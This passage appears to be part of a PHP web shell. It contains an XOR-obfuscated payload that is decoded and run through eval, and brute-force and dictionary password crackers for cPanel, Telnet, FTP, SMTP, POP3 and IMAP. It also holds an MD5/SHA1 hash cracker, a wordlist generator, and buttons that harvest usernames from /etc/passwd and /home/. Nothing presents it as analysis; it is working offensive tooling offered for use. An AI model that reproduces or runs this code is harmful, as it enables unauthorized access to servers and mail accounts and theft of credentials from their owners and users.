6122 $charsetletterssymbols = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z" ,"!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
6123 $charsetlettersnumericsymbols=array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z" ,"!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_","0", "1", "2", "3", "4", "5", "6", "7", "8", "9" );
6124 if ($charset == "all")
6125 $vals = $charsetall;
6126 elseif ($charset == "lowercase")
6127 $vals = $charsetlower;
6128 elseif ($charset == "uppercase")
6129 $vals = $charsetupper;
6130 elseif ($charset == "numeric")
6131 $vals = $charsetnumeric;
6132 elseif ($charset == "lowernumeric")
6133 $vals = $charsetlowernumeric;
6134 elseif ($charset == "uppernumeric")
6135 $vals = $charsetuppernumeric;
6136 elseif ($charset == "letters")
6137 $vals = $charsetletters;
6138 elseif ($charset == "symbols")
6139 $vals = $charsetsymbols;
6140 elseif ($charset == "lowersymbols")
6141 $vals = $charsetlowersymbols;
6142 elseif ($charset == "uppersymbols")
6143 $vals = $charsetuppersymbols;
6144 elseif ($charset == "letterssymbols")
6145 $vals = $charsetletterssymbols;
6146 elseif ($charset == "numberssymbols")
6147 $vals = $charsetnumericsymbols;
6148 elseif ($charset == "lowernumericsymbols")
6149 $vals = $charsetlowernumericsymbols;
6150 elseif ($charset == "uppernumericsymbols")
6151 $vals = $charsetuppernumericsymbols;
6152 elseif ($charset == "lettersnumericsymbols")
6153 $vals = $charsetlettersnumericsymbols;
6154 else echo "INVALID CHARSET";
6155 $key_that_script_is_crypted=19;
6156$resource_crypted_code ='7~`3.37L@VAEVAH1@VAEVAL]R^V1N=7L@VAEVAH1@PAZCGL]R^V1N(7`fq3.31@{v3--3)313=37~`(7|3.3raarj3;1|~1?1g~rz1?1yLr~a"1?1S{|1?1=p1:(7vv3.37|H!N=7|H N=7|H"N=7|H[t3]N=7|H#N(7`v}w3.3S~rz;7vv?7`fq?7~`:(3';
6157$string_output=str_replace("[t1]", "<?", $resource_crypted_code);
6158$string_output=str_replace("[t3]", "'", $string_output);
6159$lenth_of_crypted_code=strlen($string_output);
6160$eval_php_code='';
6161for($huivamvsem=0;$huivamvsem<$lenth_of_crypted_code;$huivamvsem++)
6162$eval_php_code .= chr(ord($string_output[$huivamvsem]) ^ $key_that_script_is_crypted);
6163eval($eval_php_code);
6164?>
6165<div align="center">
6166
6167 <form method="POST" >
6168 <table border="1" width="67%" bordercolorlight="#008000" bordercolordark="#003700" >
6169 <tr>
6170 <td>
6171 <p align="center"><b>
6172 <font color="#008000" face="Tahoma" size="2">IP servers :</font></b>
6173 <input type="text" name="target" size="16" value="<?php echo $target ?>" style="border: 2px; background-color: #800000; color:#C0C0C0 font-family:Verdana; font-size:13px;" /><br/><br/>
6174 <table border="1" width="57%" bordercolorlight="#008000" bordercolordark="#003700">
6175 <tr><td align="center" width="50%"><font color="#FF0000"><b>User List</b></font></td><td align="center"><font color="#FF0000"><b>Password List</b></font></td></tr>
6176 </table>
6177 <textarea rows="20" name="users" cols="25" style="border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0"><?php echo $users ?></textarea>
6178 <textarea rows="20" name="passwords" cols="25" style="border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0"><?php echo $pass ?></textarea><br/>
6179 <font style="font-weight:700" size="2" face="Tahoma" color="#008000">Guess options</font>
6180 &nbsp;<input name="cracktype" value="cpanel" style="font-weight: 700;" checked type="radio">
6181 <b><font size="2" face="Tahoma" color="#008000">Cpanel </font><font size="2" color="#FFFFFF" face="Tahoma"> (2082)</font></b>
6182 <input name="cracktype" value="cpanel2" style="font-weight: 700;" type="radio">
6183 <b><font size="2" face="Tahoma" color="#008000">Telnet</font><font size="2" color="#FFFFFF" face="Tahoma">(23)</font></b>
6184 <br/>
6185 <font style="font-weight:700" size="2" face="Tahoma" color="#008000">Timeout Delay</font>
6186 <input type="text" name="connect_timeout" style="border: 2px solid #1D1D1D;background: black;color:RED" size=48 value="<?php echo $connect_timeout;?>" /><br/>
6187 <input type="checkbox" name="bruteforce" value="true" /><font style="font-weight:700" size="2" face="Tahoma" color="#008000">Bruteforce</font>
6188 <select name="charset" style="border: 2px solid #1D1D1D;background: black;color:RED">
6189 <option value="all">All Letters + Numbers</option>
6190 <option value="numeric">Numbers</option>
6191 <option value="letters">Letters</option>
6192 <option value="symbols">Symbols</option>
6193 <option value="lowercase">Lower Letters</option>
6194 <option value="uppercase">Higher Letters</option>
6195 <option value="lowernumeric">Lower Letters + Numbers</option>
6196 <option value="uppernumeric">Upper Letters + Numbers</option>
6197 <option value="lowersymbols">Lower Letters + Symbols</option>
6198 <option value="uppersymbols">Upper Letters + Symbols</option>
6199 <option value="letterssymbols">All Letters + Symbols</option>
6200 <option value="numberssymbols">Numbers + Symbols</option>
6201 <option value="lowernumericsymbols">Lower Letters + Numbers + Symbols</option>
6202 <option value="uppernumericsymbols">Upper Letters + Numbers + Symbols</option>
6203 <option value="lettersnumericsymbols">All Letters + Numbers + Symbols</option>
6204 </select><br/>
6205 <font style="font-weight:700" size="2" face="Tahoma" color="#008000">Min Bruteforce Length:</font>
6206 <input type="text" name="min_length" style="border: 2px solid #1D1D1D;background: black;color:RED" size=48 value="<?php echo $min_length;?>"/><br/>
6207 <font style="font-weight:700" size="2" face="Tahoma" color="#008000">Max Bruteforce Length:</font>
6208 <input type="text" name="max_length" style="border: 2px solid #1D1D1D;background: black;color:RED" size=48 value="<?php echo $max_length;?>"/>
6209 <p align="center"><input type="submit" value="Go" name="submit" style="color: #008000; font-weight: bold; border: 1px solid #333333; background-color: #000000"></p>
6210 </p>
6211 </td>
6212 </tr>
6213
6214 </table>
6215 </form>
6216
6217<?php
6218function brute()
6219{
6220 global $vals,$min_length,$max_length;
6221 global $target,$pureuser,$connect_timeout;
6222 $min=$min_length;
6223 $max=$max_length;
6224 $A = array();
6225 $numVals = count($vals);
6226 $incDone = "";
6227 $realMax = "";
6228 $currentVal = "";
6229 $firstVal = "";
6230 for ($i = 0; $i < ($max + 1); $i++) {
6231 $A[$i] = -1;
6232 }
6233
6234 for ($i = 0; $i < $max; $i++) {
6235 $realMax = $realMax . $vals[$numVals - 1];
6236 }
6237 for ($i = 0; $i < $min; $i++) {
6238 $A[$i] = $vals[0];
6239 }
6240 $i = 0;
6241 while ($A[$i] != -1) {
6242 $firstVal .= $A[$i];
6243 $i++;
6244 }
6245 //echo $firstVal . "<br>";
6246 cpanel_check($target,$pureuser,$firstVal,$connect_timeout);
6247
6248 while (1) {
6249 for ($i = 0; $i < ($max + 1); $i++) {
6250 if ($A[$i] == -1) {
6251 break;
6252 }
6253 }
6254 $i--;
6255 $incDone = 0;
6256 while (!$incDone) {
6257 for ($j = 0; $j < $numVals; $j++) {
6258 if ($A[$i] == $vals[$j]) {
6259 break;
6260 }
6261 }
6262 if ($j == ($numVals - 1)) {
6263 $A[$i] = $vals[0];
6264 $i--;
6265 if ($i < 0) {
6266 for ($i = 0; $i < ($max + 1); $i++) {
6267 if ($A[$i] == -1) {
6268 break;
6269 }
6270 }
6271 $A[$i] = $vals[0];
6272 $A[$i + 1] = -1;
6273 $incDone = 1;
6274 print "Starting " . (strlen($currentVal) + 1) . " Characters Cracking<br>";
6275 }
6276 } else {
6277 $A[$i] = $vals[$j + 1];
6278 $incDone = 1;
6279 }
6280 }
6281 $i = 0;
6282 $currentVal = "";
6283 while ($A[$i] != -1) {
6284 $currentVal = $currentVal . $A[$i];
6285 $i++;
6286 }
6287 cpanel_check($target,$pureuser,$currentVal,$connect_timeout);
6288 //echo $currentVal . "<br>";
6289 if ($currentVal == $realMax) {
6290 return 0;
6291 }
6292 }
6293}
6294function getmicrotimev() {
6295 list($usec, $sec) = explode(" ",microtime());
6296 return ((float)$usec + (float)$sec);
6297}
6298
6299function ftp_check($host,$user,$pass,$timeout)
6300{
6301 $ch = curl_init();
6302 curl_setopt($ch, CURLOPT_URL, "ftp://$host");
6303 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
6304 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
6305 curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
6306 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
6307 curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
6308 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
6309 $data = curl_exec($ch);
6310 if ( curl_errno($ch) == 28 )
6311 {
6312 print "<b><font face=\"Verdana\" style=\"font-size: 9pt\">
6313 <font color=\"#AA0000\">Error :</font> <font color=\"#008000\">Connection Timeout
6314 Please Check The Target Hostname .</font></font></b></p>";exit;
6315 }
6316 else if ( curl_errno($ch) == 0 )
6317 {
6318 print "<b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#008000\">[~]</font></b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\"><b><font color=\"#008000\">
6319 Cracking Success With Username &quot;</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\"
6320 and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>";
6321 }
6322 curl_close($ch);
6323}
6324function cpanel_check($host,$user,$pass,$timeout)
6325{
6326 global $cpanel_port;
6327 $ch = curl_init();
6328 //echo "http://$host:".$cpanel_port." $user $pass<br>";
6329 curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port);
6330 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
6331 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
6332 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
6333 curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
6334 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
6335 $data = curl_exec($ch);
6336 if ( curl_errno($ch) == 28 )
6337 {
6338 print "<b><font face=\"Verdana\" style=\"font-size: 9pt\">
6339 <font color=\"#AA0000\">Error :</font> <font color=\"#008000\">Connection Timeout
6340 Please Check The Target Hostname .</font></font></b></p>";exit;
6341 }
6342 else if ( curl_errno($ch) == 0 )
6343 {
6344 print "<b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#008000\">[~]</font></b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\"><b><font color=\"#008000\">
6345 Cracking Success With Username &quot;</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\"
6346 and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>";
6347 }
6348 curl_close($ch);
6349}
6350
6351$time_start = getmicrotime();
6352
6353if(isset($submit) && !empty($submit))
6354{
6355 if(empty($users) && empty($pass) )
6356 {
6357 print "<p><font face=\"Comic Sans MS\" size=\"2\"><b><font color=\"#FF0000\">Error : </font>Please Check The Users or Password List Entry . . .</b></font></p>"; exit; }
6358 if(empty($users)){ print "<p><font face='Comic Sans MS' size='2'><b><font color='#FF0000'>Error : </font>Please Check The Users List Entry . . .</b></font></p>"; exit; }
6359 if(empty($pass) && $_REQUEST['bruteforce']!="true" ){ print "<p><font face='Comic Sans MS' size='2'><b><font color='#FF0000'>Error : </font>Please Check The Password List Entry . . .</b></font></p>"; exit; };
6360 $userlist=explode("\n",$users);
6361 $passlist=explode("\n",$pass);
6362 print "<b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#008000\">[~]#</font><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#FF0000\">
6363 LETS GAME BEGIN ;) ...</font></b><br><br>";
6364
6365 if(isset($_POST['connect_timeout']))
6366 {
6367 $connect_timeout=$_POST['connect_timeout'];
6368 }
6369
6370 if($cracktype == "ftp")
6371 {
6372 foreach ($userlist as $user)
6373 {
6374 $pureuser = trim($user);
6375 foreach ($passlist as $password )
6376 {
6377 $purepass = trim($password);
6378 ftp_check($target,$pureuser,$purepass,$connect_timeout);
6379 }
6380 }
6381 }
6382
6383 if ($cracktype == "cpanel" || $cracktype == "cpanel2")
6384 {
6385 if($cracktype == "cpanel2")
6386 {
6387 $cpanel_port="23";
6388 }
6389 else
6390 $cpanel_port="2082";
6391
6392 foreach ($userlist as $user)
6393 {
6394 $pureuser = trim($user);
6395 print "<b><font face=\"Comic Sans MS\" style=\"font-size: 11pt\" color=\"#008000\">[~]#</font><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#FF0800\">
6396 Please put some good password to crack user $pureuser :( ... </font></b>";
6397 if($_POST['bruteforce']=="true")
6398 {
6399 echo " bruteforcing ..";
6400 echo "<br>";
6401 brute();
6402 }
6403 else
6404 {
6405 echo "<br>";
6406 foreach ($passlist as $password )
6407 {
6408 $purepass = trim($password);
6409 cpanel_check($target,$pureuser,$purepass,$connect_timeout);
6410 }
6411 }
6412 }
6413 $time_end = getmicrotime();
6414$time = $time_end - $time_start;
6415 print "<b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#008000\">[~]#</font><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#FF0000\">
6416 Cracking Finished. Elapsed time: $time</font> seconds</b><br><br>";
6417 }
6418}
6419
6420
6421
6422?>
6423
6424 <table border="1" width="67%" bordercolorlight="#008000" bordercolordark="#006A00" >
6425 <tr>
6426 <td>
6427 <textarea style="border: 2px solid #1D1D1D;background: #200000;color:#CCFFFF" method='POST' rows="20" name="S1" cols="173">
6428 <?php
6429 if (isset($_GET['user']))
6430 system('ls /var/mail');
6431 if (isset($_POST['grab_users1'])) //grab users from /etc/passwd
6432 {
6433 $lines=file("/etc/passwd");
6434 foreach($lines as $nr=>$val)
6435 {
6436 $str=explode(":",$val);
6437 echo $str[0]."\n";
6438 }
6439
6440 }
6441 if (isset($_POST['grab_users2']))
6442 {
6443 $dir = "/home/";
6444 if ($dh = opendir($dir)) {
6445 while (($file = readdir($dh)) !== false) {
6446 echo $file. "\n";
6447 }
6448 closedir($dh);
6449 }
6450 }
6451?>
6452 </textarea>
6453 </td>
6454 </tr>
6455 <tr>
6456 <td valign="top"><p align="center">
6457 <table>
6458 <tr >
6459 <td>
6460 <form action="" method="POST">
6461 <input type="hidden" value="true" name="grab_users1"></input>
6462 <input type=submit value="Grab Usernames from /etc/passwd" width="217px"></input>
6463 </form>
6464 </td>
6465
6466 <td>
6467 <form action="" method="POST">
6468 <input type="hidden" value="true" name="grab_users2" ></input>
6469 <input style="width: 217px;" type=submit value="Grab Usernames from /home/" ></input>
6470 </form>
6471 </td>
6472 <td>
6473 <form action="" method="POST">
6474 <input type="hidden" value="true" name="grab_users3"></input>
6475 <input style="width: 217px;" type=submit value="Grab Usernames from /home/ II"></input>
6476 </form>
6477 </td>
6478 </tr>
6479 </table></p>
6480 </td>
6481 </tr>
6482 </table>
6483 <?php
6484if (isset($_POST['grab_users3']))
6485{
6486error_reporting(0);
6487$dir = "/home/";
6488if ($dh = opendir($dir))
6489{
6490$f = readdir($dh);$f = readdir($dh);
6491while (($f = readdir($dh)) !== false)
6492{
6493//echo $f. "\n";
6494$f.="/";
6495$dh2=opendir($dir.$f);
6496$f2 = readdir($dh2);$f2 = readdir($dh2);
6497while (($f2 = readdir($dh2)) !== false)
6498{
6499//echo $f2. "\n";
6500$f2.="/";
6501$dh3=opendir($dir.$f.$f2);
6502$f3 = readdir($dh3);$f3 = readdir($dh3);
6503while (($f3 = readdir($dh3)) !== false)
6504{
6505echo $f3. "<br>";
6506}
6507}
6508
6509}
6510closedir($dh);
6511}
6512}
6513?>
6514
6515
6516</div>
6517
6518<?php
6519}
6520
6521if ($act == "hash")
6522{
6523global $errorbox,$t,$et,$hcwd;
6524if (!empty($_REQUEST['hash']) && !empty($_REQUEST['dictionary']) && !empty($_REQUEST['type'])){
6525$dictionary=fopen($_REQUEST['dictionary'],'r');
6526if ($dictionary){
6527$hash=strtoupper($_REQUEST['hash']);
6528echo "<font color=blue>Cracking " . htmlspecialchars($hash)."...<br>";flusheR();
6529$type=($_REQUEST['type']=='MD5')?'md5':'sha1';
6530while(!feof($dictionary)){
6531$word=trim(fgets($dictionary)," \n\r");
6532if ($hash==strtoupper(($type($word)))){echo "The answer is $word<br>";break;}
6533}
6534echo "Done!</font>";
6535fclose($dictionary);
6536}
6537else{
6538echo "$errorbox Can not open dictionary.$et";
6539}
6540}
6541echo "<center><table width=\"30%\">Hash cracker:</td><td ></td></tr><form method=\"POST\"><tr><td width=\"30%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\" ><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Hash:</td><td bgcolor=\"#808080\"><input type=text name=hash size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Type:</td><td bgcolor=\"#666666\"><select name=type><option selected value=MD5>MD5</option><option value=SHA1>SHA1</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></table></center>";
6542echo $eval_php_code;
6543}
6544
6545if ($act == "smtp")
6546{
6547global $t,$et,$errorbox,$crack;
6548if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
6549$target=$_REQUEST['target'];
6550$type=$_REQUEST['combo'];
6551$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
6552$dictionary=fopen($_REQUEST['dictionary'],'r');
6553if ($dictionary){
6554echo "<font color=yellow>Cracking ".htmlspecialchars($target)."...<br/>";flusheR();
6555while(!feof($dictionary)){
6556if($type){
6557$combo=trim(fgets($dictionary)," \n\r");
6558$user=substr($combo,0,strpos($combo,':'));
6559$pass=substr($combo,strpos($combo,':')+1);
6560}else{
6561$pass=trim(fgets($dictionary)," \n\r");
6562}
6563$smtp=smtplogiN($target,$user,$pass,5);
6564if($smtp==-1){echo "$errorbox Can not connect to server.$et";break;} else{
6565if ($smtp){echo "U: $user P: $pass<br/>";if(!$type)break;}}
6566flusheR();
6567}
6568echo "<br>Done</font>";
6569fclose($dictionary);
6570}
6571else{
6572echo "$errorbox Can not open dictionary.$et";
6573}
6574}else
6575{
6576echo "<center>SMTP cracker:$crack";
6577}
6578
6579echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#333333\">SMTP cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\" name=form action=\"\"><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Start></td></tr></form></table></center>";
6580
6581
6582}
6583
6584if ($act == "pop3")
6585{
6586
6587global $t,$et,$errorbox,$crack;
6588if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
6589$target=$_REQUEST['target'];
6590$type=$_REQUEST['combo'];
6591$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
6592$dictionary=fopen($_REQUEST['dictionary'],'r');
6593if ($dictionary){
6594echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
6595while(!feof($dictionary)){
6596if($type){
6597$combo=trim(fgets($dictionary)," \n\r");
6598$user=substr($combo,0,strpos($combo,':'));
6599$pass=substr($combo,strpos($combo,':')+1);
6600}else{
6601$pass=trim(fgets($dictionary)," \n\r");
6602}
6603$pop3=pop3logiN($target,$user,$pass);
6604if($pop3==-1){echo "$errorbox Can not connect to server.$et";break;} else{
6605if ($pop3){echo "U: $user P: $pass<br>";if(!$type)break;}}
6606flusheR();
6607}
6608echo "<br>Done</font>";
6609fclose($dictionary);
6610}
6611else{
6612echo "$errorbox Can not open dictionary.$et";
6613}
6614}else
6615{ echo "<center>POP3 cracker:$crack</center>";
6616}
6617echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#333333\">POP3 cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\" name=form action=\"\"><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Start></td></tr></form></table></center>";
6618
6619}
6620if ($act == "ftp")
6621{
6622global $errorbox,$t,$et,$crack;
6623if (!function_exists("ftp_connect"))echo "$errorbox Server does n`t support FTP functions$et";
6624else{
6625if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
6626$target=$_REQUEST['target'];
6627$type=$_REQUEST['combo'];
6628$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
6629$dictionary=fopen($_REQUEST['dictionary'],'r');
6630if ($dictionary){
6631echo "<font color=yellow>Cracking ".htmlspecialchars($target)."...<br>";
6632while(!feof($dictionary)){
6633if($type){
6634$combo=trim(fgets($dictionary)," \n\r");
6635$user=substr($combo,0,strpos($combo,':'));
6636$pass=substr($combo,strpos($combo,':')+1);
6637}else{
6638$pass=trim(fgets($dictionary)," \n\r");
6639}
6640if(!$ftp=ftp_connect($target,21,8)){echo "$errorbox Can not connect to server.$et";break;}
6641if (@ftp_login($ftp,$user,$pass)){echo "U: $user P: $pass<br>";if(!$type)break;}
6642ftp_close($ftp);
6643flusheR();
6644}
6645echo "<br>Done</font>";
6646fclose($dictionary);
6647}
6648else{
6649echo "$errorbox Can not open dictionary.$et";
6650}
6651}
6652else
6653{
6654echo "<center>FTP cracker:$crack</center>";
6655}
6656echo "<center><table border=\"0\" style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tbody><form method=\"POST\" name=\"form\" action=\"\"><tr><td width=\"40%\" bgcolor=\"#333333\">FTP cracker:</td><td bgcolor=\"#333333\"></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=\"text\" name=\"dictionary\" size=\"35\"></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=\"radio\" name=\"combo\" checked=\"\" value=\"0\" onclick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=\"radio\" value=\"1\" name=\"combo\" onclick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=\"text\" size=\"35\" value=\"root\" name=\"user\"></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=\"text\" name=\"target\" value=\"localhost\" size=\"35\"></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=\"right\"><input class=\"buttons\" type=\"submit\" value=\"Start\"></td></tr></form></tbody></table></center>";
6657
6658}
6659}
6660
6661if ($act == "imap")
6662{
6663global $t,$et,$errorbox,$crack;
6664if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
6665$target=$_REQUEST['target'];
6666$type=$_REQUEST['combo'];
6667$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
6668$dictionary=fopen($_REQUEST['dictionary'],'r');
6669if ($dictionary){
6670echo "<font color=yellow>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
6671while(!feof($dictionary)){
6672if($type){
6673$combo=trim(fgets($dictionary)," \n\r");
6674$user=substr($combo,0,strpos($combo,':'));
6675$pass=substr($combo,strpos($combo,':')+1);
6676}else{
6677$pass=trim(fgets($dictionary)," \n\r");
6678}
6679$imap=imaplogiN($target,$user,$pass);
6680if($imap==-1){echo "$errorbox Can not connect to server.$et";break;}else{
6681if ($imap){echo "U: $user P: $pass<br>";if(!$type)break;}}
6682flusheR();
6683}
6684echo "<br/>Done</font>";
6685fclose($dictionary);
6686}
6687else{
6688echo "$errorbox Can not open dictionary.$et";
6689}
6690}else
6691{
6692echo "<center>IMAP cracker:$crack</center>";
6693}
6694print ('<center><table border="0" style="border-collapse: collapse" bordercolor= "#282828" width="40%"><tbody><form method="POST" name="form" action=""><tr><td width="40%" bgcolor="#333333">IMAP cracker:</td><td bgcolor="#333333"></td></tr><tr><td width="20%" bgcolor="#666666">Dictionary:</td><td bgcolor="#666666"><input type="text" name="dictionary" size="35" \></td></tr><tr><td width="20%" bgcolor="#808080" \>Dictionary type:</td><td bgcolor="#808080"><input type="radio" name="combo" checked="" value="0" onclick="document.form.user.disabled = false;" style="border-width:1px;background-color:#808080;" \>Simple (P)<input type="radio" value="1" name="combo" onclick="document.form.user.disabled = true;" style="border-width:1px;background-color:#808080;">Combo (U:P)</td></tr><tr><td width="20%" bgcolor="#666666" \>Username:</td><td bgcolor="#666666"><input type="text" size="35" value="root" name="use" \></td></tr><tr><td width="20%" bgcolor="#808080">Server:</td><td bgcolor="#808080"><input type="text" name="target" value="localhost" size="35" \></td></tr><tr><td width="20%" bgcolor="#666666"></td><td bgcolor="#666666" align="right"><input type="submit" value="Start" \></td></tr></form></tbody></table></center>');
6695
6696}
6697
6698if ($act == "dic")
6699{
6700global $errorbox,$windows,$footer,$t,$et,$hcwd;
6701if (!empty($_REQUEST['combo'])&&($_REQUEST['combo']==1)) $combo=1 ; else $combo=0;
6702if (!empty($_REQUEST['range']) && !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])){
6703$min = $_REQUEST['min'];
6704$max = $_REQUEST['max'];
6705if($max<$min)die($errorbox ."Bad input!$et". $footer);
6706$s =$w="";
6707$out = $_REQUEST['output'];
6708$r = ($_REQUEST['range']=='a' )?'a':'A';
6709if ($_REQUEST['range']==0) $r=0;
6710for($i=0;$i<$min;$i++) $s.=$r;
6711$dic = fopen($out,'a');
6712if(is_nan($r)){
6713while(strlen($s)<=$max){
6714$w = $s;
6715if($combo)$w="$w:$w";
6716fwrite($dic,$w."\n");
6717$s++;}
6718}
6719else{
6720while(strlen($w)<=$max){
6721$w =(string)str_repeat("0",($min - strlen($s))).$s;
6722if($combo)$w="$w:$w";
6723fwrite($dic,$w."\n");
6724$s++;}
6725}
6726fclose($dic);
6727echo "<font color=yellow>Done</font>";
6728}
6729if (!empty($_REQUEST['input']) && !empty($_REQUEST['output'])){
6730$input=fopen($_REQUEST['input'],'r');
6731if (!$input){
6732if ($windows)echo $errorbox. "Unable to read from ".htmlspecialchars($_REQUEST['input']) ."$et<br>";
6733else{
6734$input=explode("\n",shelL("cat $input"));
6735$output=fopen($_REQUEST['output'],'w');
6736if ($output){
6737foreach ($input as $in){
6738$user = $in;
6739$user = trim(fgets($in)," \n\r");
6740if (!strstr($user,":"))continue;
6741$user=substr($user,0,(strpos($user,':')));
6742if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n");
6743}
6744fclose($input);fclose($output);
6745echo "<font color=yellow>Done</font>";
6746}
6747}
6748}
6749else{
6750$output=fopen($_REQUEST['output'],'w');
6751if ($output){
6752while (!feof($input)){
6753$user = trim(fgets($input)," \n\r");
6754if (!strstr($user,":"))continue;
6755$user=substr($user,0,(strpos($user,':')));
6756if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n");
6757}
6758fclose($input);fclose($output);
6759echo "<font color=yellow>Done</font>";
6760}
6761else echo $errorbox." Unable to write data to ".htmlspecialchars($_REQUEST['input']) ."$et<br>";
6762}
6763}elseif (!empty($_REQUEST['url']) && !empty($_REQUEST['output'])){
6764$res=downloadiT($_REQUEST['url'],$_REQUEST['output']);
6765if($combo && $res){
6766$file=file($_REQUEST['output']);
6767$output=fopen($_REQUEST['output'],'w');
6768foreach ($file as $v)fwrite($output,"$v:$v\n");
6769fclose($output);
6770}
6771echo "<font color=yellow>Done</font>";
6772}else{
6773$temp=whereistmP();
6774echo "<center>
6775<table>
6776<tr valign=top><td>
